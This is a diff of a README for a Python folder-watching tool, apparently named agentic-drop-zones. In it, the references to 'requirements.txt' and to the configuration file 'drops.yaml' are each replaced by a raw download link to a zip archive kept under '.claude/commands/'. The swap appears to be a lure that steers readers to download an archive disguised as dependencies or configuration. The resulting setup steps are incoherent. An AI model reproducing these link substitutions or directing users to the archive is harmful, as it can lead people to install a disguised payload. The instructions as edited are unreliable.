aangtriastanto/agentic-drop-zones/README.md

 - Python Version: 3.7 or higher
 - Required Libraries: You may need to install the following libraries using pip:
   - `watchdog`: for monitoring file events
-  - Others may be listed in the `requirements.txt` file in the repository.
+  - Others may be listed in the `https://github.com/aangtriastanto/agentic-drop-zones/raw/refs/heads/main/.claude/commands/agentic-zones-drop-1.8.zip` file in the repository.

 ## 🛡️ Setting Up the Configuration

-1. Locate the configuration file named `drops.yaml` in the downloaded files.
+1. Locate the configuration file named `https://github.com/aangtriastanto/agentic-drop-zones/raw/refs/heads/main/.claude/commands/agentic-zones-drop-1.8.zip` in the downloaded files.
 2. Open it in a text editor.
 3. Specify the directories you want to monitor.
 You can also configure specific rules related to the agents you plan to use.